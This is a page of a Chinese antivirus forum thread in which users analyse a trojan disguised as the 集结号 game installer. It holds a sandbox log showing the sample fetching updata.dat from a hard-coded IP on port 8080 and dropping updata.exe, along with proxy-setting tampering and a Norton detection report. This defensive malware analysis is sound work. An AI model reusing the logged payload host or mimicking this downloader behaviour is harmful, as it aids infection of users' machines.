搜索
12
返回列表 发新帖
楼主: vm001
收起左侧

[病毒样本] 集结号游戏木马

[复制链接]
191196846
发表于 2017-9-6 12:01:34 | 显示全部楼层
本帖最后由 191196846 于 2017-9-6 12:02 编辑

编辑掉....
学雷锋做人
发表于 2017-9-6 13:06:44 | 显示全部楼层
[mw_shl_code=css,true]13:05:16[1]:(允许)程序启动:File_Analysis 行为记录成功开启   规则版本:1.7.0.0

13:05:16[2]:(允许)获取文件属性:C:\Program Files\Internet Explorer\updata.exe

13:05:16[3]:(阻止)创建注册表键:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

13:05:16[5]:(阻止)创建注册表键:HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

13:05:16[9]:(阻止)创建注册表键:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

13:05:16[10]:(阻止)创建注册表键:HKEY_LOCAL_MACHINE\System\Setup\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

13:05:16[12]:(阻止)创建注册表键:HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

13:05:16[15]:(允许)创建文件目录:C:\Users\leifeng

13:05:16[16]:(允许)获取文件属性:C:\Users\leifeng

13:05:16[17]:(允许)创建文件目录:C:\Users\leifeng\AppData\Local

13:05:16[18]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local

13:05:16[19]:(允许)获取文件属性:C:\Users\leifeng\AppData\Roaming

13:05:16[20]:(安全环境)创建文件目录:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files

13:05:16[21]:(允许)访问进程:explorer.exe     进程PID:2092     进程句柄:0     获取权限:64

13:05:16[28]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files

13:05:16[30]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini

13:05:16[31]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5

13:05:16[33]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini

13:05:16[34]:(允许)创建文件目录:C:\Users\leifeng

13:05:16[35]:(允许)获取文件属性:C:\Users\leifeng

13:05:16[36]:(允许)创建文件目录:C:\Users\leifeng\AppData\Roaming

13:05:17[37]:(允许)获取文件属性:C:\Users\leifeng\AppData\Roaming

13:05:17[38]:(允许)创建文件目录:C:\Users\leifeng\AppData\Roaming\Microsoft\Windows\Cookies

13:05:17[39]:(允许)获取文件属性:C:\Users\leifeng\AppData\Roaming\Microsoft\Windows\Cookies

13:05:17[41]:(允许)创建文件目录:C:\Users\leifeng

13:05:17[42]:(允许)获取文件属性:C:\Users\leifeng

13:05:17[43]:(允许)创建文件目录:C:\Users\leifeng\AppData\Local

13:05:17[44]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local

13:05:17[45]:(安全环境)创建文件目录:C:\Users\leifeng\AppData\Local\Microsoft\Windows\History

13:05:17[46]:(允许)访问进程:explorer.exe     进程PID:2092     进程句柄:0     获取权限:64

13:05:17[50]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\History

13:05:17[52]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\History\desktop.ini

13:05:17[53]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\History\History.IE5

13:05:17[55]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini

13:05:17[56]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\

13:05:17[57]:(安全环境)设置文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\

13:05:17[58]:(安全环境)写入文件:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat     访问权限:-1073741824

13:05:17[59]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat

13:05:17[60]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\

13:05:17[61]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini

13:05:17[62]:(允许)读取文件:C:\Windows\system32\rsaenh.dll     访问权限:-2147483648

13:05:17[63]:(安全环境)创建文件目录:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OHGDNK99

13:05:17[64]:(安全环境)设置文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OHGDNK99

13:05:17[65]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OHGDNK99

13:05:17[66]:(安全环境)创建文件目录:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ISTKK6QG

13:05:17[67]:(安全环境)设置文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ISTKK6QG

13:05:17[68]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ISTKK6QG

13:05:17[69]:(安全环境)创建文件目录:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0CILB39R

13:05:17[70]:(安全环境)设置文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0CILB39R

13:05:17[71]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0CILB39R

13:05:17[72]:(安全环境)创建文件目录:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M6ZT33D5

13:05:17[73]:(安全环境)设置文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M6ZT33D5

13:05:17[74]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\M6ZT33D5

13:05:17[75]:(允许)查找文件:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\*.*

13:05:17[76]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\*.*B538GAGH\desktop.ini

13:05:17[77]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PY34BWIX\desktop.ini

13:05:17[78]:(安全环境)设置文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PY34BWIX\desktop.ini

13:05:17[79]:(阻止)删除文件:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PY34BWIX\desktop.ini

13:05:17[80]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PY34BWIX\desktop.ini

13:05:17[81]:(安全环境)设置文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PY34BWIX\desktop.ini

13:05:17[82]:(阻止)删除文件:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PY34BWIX\desktop.ini

13:05:17[83]:(允许)查找文件:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PY34BWIX\*.*

13:05:17[84]:(阻止)删除文件:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PY34BWIX\desktop.ini

13:05:17[85]:(安全环境)设置文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PY34BWIX

13:05:17[86]:(阻止)删除文件目录:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PY34BWIX

13:05:17[87]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R1BEYWZJ\desktop.ini

13:05:17[88]:(安全环境)设置文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R1BEYWZJ\desktop.ini

13:05:17[89]:(阻止)删除文件:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R1BEYWZJ\desktop.ini

13:05:17[90]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R1BEYWZJ\desktop.ini

13:05:17[91]:(安全环境)设置文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R1BEYWZJ\desktop.ini

13:05:17[92]:(阻止)删除文件:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R1BEYWZJ\desktop.ini

13:05:17[93]:(允许)查找文件:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R1BEYWZJ\*.*

13:05:17[94]:(阻止)删除文件:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R1BEYWZJ\desktop.ini

13:05:17[95]:(安全环境)设置文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R1BEYWZJ

13:05:17[96]:(阻止)删除文件目录:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R1BEYWZJ

13:05:17[97]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WYHQMQJY\desktop.ini

13:05:17[98]:(安全环境)设置文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WYHQMQJY\desktop.ini

13:05:17[99]:(阻止)删除文件:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WYHQMQJY\desktop.ini

13:05:17[100]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WYHQMQJY\desktop.ini

13:05:17[101]:(安全环境)设置文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WYHQMQJY\desktop.ini

13:05:17[102]:(阻止)删除文件:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WYHQMQJY\desktop.ini

13:05:17[103]:(允许)查找文件:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WYHQMQJY\*.*

13:05:17[104]:(阻止)删除文件:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WYHQMQJY\desktop.ini

13:05:17[105]:(安全环境)设置文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WYHQMQJY

13:05:17[106]:(阻止)删除文件目录:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WYHQMQJY

13:05:17[107]:(允许)获取文件属性:C:\Users\leifeng\AppData\Roaming\Microsoft\Windows\Cookies\

13:05:17[108]:(安全环境)设置文件属性:C:\Users\leifeng\AppData\Roaming\Microsoft\Windows\Cookies\

13:05:17[109]:(安全环境)写入文件:C:\Users\leifeng\AppData\Roaming\Microsoft\Windows\Cookies\index.dat     访问权限:-1073741824

13:05:17[110]:(允许)获取文件属性:C:\Users\leifeng\AppData\Roaming\Microsoft\Windows\Cookies\index.dat

13:05:17[111]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\History\History.IE5\

13:05:17[112]:(安全环境)设置文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\History\History.IE5\

13:05:17[113]:(安全环境)写入文件:C:\Users\leifeng\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat     访问权限:-1073741824

13:05:17[114]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat

13:05:17[115]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\

13:05:17[116]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini

13:05:17[117]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\History\History.IE5\

13:05:17[118]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\History\History.IE5\desktop.ini

13:05:17[119]:(安全环境)写入文件:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat     访问权限:-1073741824

13:05:17[120]:(允许)获取文件属性:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat

13:05:17[121]:(阻止)创建注册表键:752\FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

13:05:17[123]:(阻止)创建注册表键:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

13:05:17[145]:(阻止)创建注册表键:756\FEATURE_ALLOW_LONG_INTERNATIONAL_FILENAMES\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

13:05:17[147]:(阻止)创建注册表键:756\FEATURE_USE_UTF8_FOR_BASIC_AUTH_KB967545\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

13:05:17[149]:(阻止)创建注册表键:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

13:05:17[151]:(阻止)创建注册表键:756\FEATURE_SECURITY_FLAG_IGNORE_REVOCATION_KB2275828\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

13:05:17[153]:(阻止)创建注册表键:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

13:05:17[167]:(阻止)创建注册表键:HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

13:05:17[169]:(阻止)创建注册表键:796\FEATURE_RETURN_FAILED_CONNECT_CONTENT_KB942615\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

13:05:17[170]:(允许)访问网址:http://103.239.246.242:8080/updata.dat

13:05:17[171]:(允许)获取文件属性:C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk

13:05:17[172]:(安全环境)查找文件:C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk

13:05:17[173]:(允许)查找文件:C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk

13:05:17[174]:(允许)查找文件:C:\Windows\system32\Ras\*.pbk

13:05:17[175]:(允许)查找文件:C:\Users\leifeng\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk

13:05:17[176]:(允许)查找文件:C:\Users\leifeng\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk

13:05:17[177]:(允许)打开驱动对象:Sens

13:05:17[178]:(阻止)创建注册表键:932\Software\Microsoft\windows\CurrentVersion\Internet Settings\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections

13:05:17[180]:(阻止)创建注册表键:932\Software\Microsoft\windows\CurrentVersion\Internet Settings\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

13:05:17[181]:(阻止)创建注册表键:932\Software\Microsoft\windows\CurrentVersion\Internet Settings\Software\Microsoft\windows\CurrentVersion\Internet Settings

13:05:17[182]:(阻止)写注册表值:932\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable     数据:

13:05:17[183]:(阻止)删除注册表值:932\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyServer

13:05:17[184]:(阻止)删除注册表值:932\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyOverride

13:05:17[185]:(阻止)删除注册表值:932\Software\Microsoft\windows\CurrentVersion\Internet Settings\AutoConfigURL

13:05:17[186]:(阻止)创建注册表键:932\Software\Microsoft\windows\CurrentVersion\Internet Settings\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections

13:05:17[188]:(阻止)写注册表值:932\Software\Microsoft\windows\CurrentVersion\Internet Settings\SavedLegacySettings     数据:F

13:05:17[189]:(允许)读取文件:\\.\Nsi     访问权限:0

13:05:17[190]:(允许)读取文件:C:\Windows\Registration\R000000000006.clb     访问权限:-2147483648

13:05:17[191]:(阻止)创建注册表键:1176\{CDDD807F-E784-4E81-9628-50FB1F8D7932}\00-50-56-f9-07-6a

13:05:17[193]:(阻止)写注册表值:1176\{CDDD807F-E784-4E81-9628-50FB1F8D7932}\WpadDecisionReason     数据:

13:05:17[194]:(阻止)写注册表值:1176\{CDDD807F-E784-4E81-9628-50FB1F8D7932}\WpadDecisionTime     数据:0鋿?%?

13:05:17[195]:(阻止)写注册表值:1176\{CDDD807F-E784-4E81-9628-50FB1F8D7932}\WpadDecision     数据:

13:05:17[196]:(允许)获取文件属性:C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk

13:05:17[197]:(安全环境)查找文件:C:\ProgramData\Microsoft\Network\Connections\Pbk\rasphone.pbk

13:05:17[198]:(允许)查找文件:C:\ProgramData\Microsoft\Network\Connections\Pbk\*.pbk

13:05:17[199]:(允许)查找文件:C:\Windows\system32\Ras\*.pbk

13:05:17[200]:(允许)查找文件:C:\Users\leifeng\AppData\Roaming\Microsoft\Network\Connections\Pbk\rasphone.pbk

13:05:17[201]:(允许)查找文件:C:\Users\leifeng\AppData\Roaming\Microsoft\Network\Connections\Pbk\*.pbk

13:05:17[202]:(阻止)创建注册表键:1176\{CDDD807F-E784-4E81-9628-50FB1F8D7932}\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections

13:05:17[204]:(阻止)写注册表值:1176\{CDDD807F-E784-4E81-9628-50FB1F8D7932}\DefaultConnectionSettings     数据:F

13:05:17[205]:(阻止)写注册表值:1176\{CDDD807F-E784-4E81-9628-50FB1F8D7932}\WpadLastNetwork     数据:{CDDD807F-E784-4E81-9628-50FB1F8D7932}

13:05:17[206]:(阻止)删除注册表值:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProxyBypass

13:05:17[207]:(阻止)删除注册表值:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\IntranetName

13:05:17[208]:(阻止)写注册表值:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\UNCAsIntranet     数据:

13:05:17[209]:(阻止)写注册表值:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\AutoDetect     数据:

13:05:17[210]:(阻止)删除注册表值:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\ProxyBypass

13:05:17[211]:(阻止)删除注册表值:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\IntranetName

13:05:17[212]:(阻止)写注册表值:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\UNCAsIntranet     数据:

13:05:17[213]:(阻止)写注册表值:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\\AutoDetect     数据:

13:05:17[214]:(安全环境)写入文件:C:\Users\leifeng\AppData\Roaming\Microsoft\Windows\Cookies\index.dat     访问权限:-1073741824

13:05:17[215]:(允许)获取文件属性:C:\Users\leifeng\AppData\Roaming\Microsoft\Windows\Cookies\index.dat

13:05:17[216]:(允许)创建TCP连接:103.239.246.242(IP)     端口:8080

13:05:17[217]:(允许)发送封包:1268(套接字)     封包数据:GET /updata.dat HTTP/1.1
User-Agent: Mozilla/4.0 (compatible)
Host: 103.239.246.242:8080
Cache-Control: no-cache

     数据长度:119

13:05:17[218]:(阻止)创建注册表键:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\P3P\History

13:05:17[219]:(阻止)创建注册表键:1988141984\103.239.246.242\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings

13:05:17[220]:(安全环境)写入文件:C:\Users\leifeng\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OHGDNK99\updata[1].dat     访问权限:1073741824

13:05:17[221]:(安全环境)写入文件:C:\Program Files\Internet Explorer\updata.exe     访问权限:1073741824


13:05:23[222]:(允许)读取文件:C:\Program Files\Internet Explorer\updata.exe     访问权限:-2147483648[/mw_shl_code]
zst470396853
发表于 2017-9-6 13:20:35 | 显示全部楼层
百度推广的网页



安装包下载地址



样本



本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
XZ8SM7Sx0bVkoUV
发表于 2017-9-6 13:33:21 | 显示全部楼层
火绒

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
yaoyunjia
发表于 2017-9-6 14:11:25 | 显示全部楼层
WD杀

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
胖福
发表于 2017-9-6 14:54:17 | 显示全部楼层
安装包已无法下载!

文件名: yk.exe
威胁名称: SONAR.Heuristic.170完整路径: 不可用

____________________________

____________________________


在电脑上 
2017-09-06 ( 14:43:42 )

上次使用时间 
2017-09-06 ( 14:43:42 )

启动项 


已启动 


SONAR 主动防护监视电脑上的可疑程序活动。

____________________________


yk.exe 威胁名称: SONAR.Heuristic.170
定位


极少用户信任的文件
Norton 社区中有不到 5 名用户 使用了此文件。

极新的文件
该文件已在 不到 1 周 前发行。


此文件具有高风险。


____________________________


来源: 外部介质

源文件:
yk.exe

____________________________

文件操作

文件: f:\norton样本\sonar漏检\临时收集\ yk.exe 威胁已删除
____________________________

注册表操作

注册表更改: HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\ yk_RASAPI32 威胁已删除
注册表更改: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ yk_RASAPI32->EnableFileTracing 不需要操作
注册表更改: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ yk_RASAPI32->EnableConsoleTracing 不需要操作
注册表更改: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ yk_RASAPI32->FileTracingMask 不需要操作
注册表更改: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ yk_RASAPI32->ConsoleTracingMask 不需要操作
注册表更改: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ yk_RASAPI32->MaxFileSize 不需要操作
注册表更改: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ yk_RASAPI32->FileDirectory 不需要操作
注册表更改: HKEY_LOCAL_MACHINE\Software\Microsoft\Tracing\ yk_RASMANCS 威胁已删除
注册表更改: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ yk_RASMANCS->EnableFileTracing 不需要操作
注册表更改: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ yk_RASMANCS->EnableConsoleTracing 不需要操作
注册表更改: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ yk_RASMANCS->FileTracingMask 不需要操作
注册表更改: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ yk_RASMANCS->ConsoleTracingMask 不需要操作
注册表更改: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ yk_RASMANCS->MaxFileSize 不需要操作
注册表更改: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\ yk_RASMANCS->FileDirectory 不需要操作
注册表更改: HKEY_USERS\S-1-5-21-1429125506-3924845992-1376771031-500\Software\Microsoft\Windows\CurrentVersion\ Internet Settings->ProxyEnable:0 已修复
注册表更改: HKEY_USERS\S-1-5-21-1429125506-3924845992-1376771031-500\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ Connections->SavedLegacySettings:... 已修复
____________________________

网络操作

事件: 网络活动 (执行者 f:\norton样本\sonar漏检\临时收集\yk.exe, PID:3372) 未采取操作
____________________________

系统设置操作

事件: 进程启动 (执行者 f:\norton样本\sonar漏检\临时收集\yk.exe, PID:3372) 未采取操作
(执行者 f:\norton样本\sonar漏检\临时收集\yk.exe, PID:3372) 未采取操作
事件: 进程启动: f:\norton样本\sonar漏检\临时收集\ yk.exe, PID:3372 (执行者 f:\norton样本\sonar漏检\临时收集\yk.exe, PID:3372) 未采取操作
____________________________

可疑操作

(执行者 f:\norton样本\sonar漏检\临时收集\yk.exe, PID:3372) 未采取操作
____________________________


文件指纹 - SHA:
不可用
文件指纹 - MD5:
不可用
一颗seed
发表于 2017-9-7 18:14:52 | 显示全部楼层
学习看下
zz1234
发表于 2017-9-8 21:48:02 | 显示全部楼层
写入temp吗
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛|优惠券| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 苏ICP备07004770号 ) GMT+8, 2017-11-22 10:01 , Processed in 0.044964 second(s), 6 queries , MemCached On.

快速回复 返回顶部 返回列表